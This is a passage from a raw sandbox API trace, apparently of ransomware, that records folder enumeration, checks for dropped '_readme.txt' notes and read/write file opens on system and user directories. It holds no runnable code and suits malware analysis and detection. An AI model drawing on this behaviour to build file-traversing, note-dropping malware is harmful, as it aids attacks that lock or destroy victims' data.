lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.097] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.097] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.097] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0130.097] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.098] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.098] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned=".txt" [0130.098] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.098] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.098] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.098] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.098] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0130.098] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.098] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.099] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.099] PathFindFileNameW (pszPath="") returned="" [0130.099] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.099] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.099] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.099] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.099] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.099] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.100] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.100] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.100] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.100] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0130.100] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.100] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.100] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.100] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.100] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.101] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0130.101] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.101] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.101] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.101] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.101] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned=".txt" [0130.101] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.101] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.101] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.101] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.101] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.101] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.101] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.101] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0130.102] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.102] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.102] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.102] PathFindFileNameW (pszPath="") returned="" [0130.102] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.102] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.102] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.102] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.102] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.103] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0130.103] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.103] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.103] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0130.103] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.103] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0130.103] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.103] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.103] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.103] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.103] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.104] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0130.104] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.104] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.104] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned=".txt" [0130.104] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3950e40, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.104] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.104] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0130.104] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.104] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0130.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.105] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.105] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.105] PathFindFileNameW (pszPath="") returned="" [0130.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.105] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.105] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.105] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.106] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.106] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0130.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.106] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0130.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.106] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe3950e40, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3950e40, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.106] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0130.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c010 [0130.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce97a0 [0130.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.107] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x38) returned 0xdce3a70 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.107] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c010 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x54) returned 0xdd08ea8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757bca0 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.107] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c010 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c118 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0130.107] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc0c6d6a0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xc0c6d6a0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c010 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa8) returned 0x74bf8f0 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757bca0 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5fc8 [0130.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c900 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ba90 [0130.108] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda5a11c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda5a11c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.108] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c8a8 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.108] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c748 [0130.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.108] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0130.108] RtlAllocateHeap 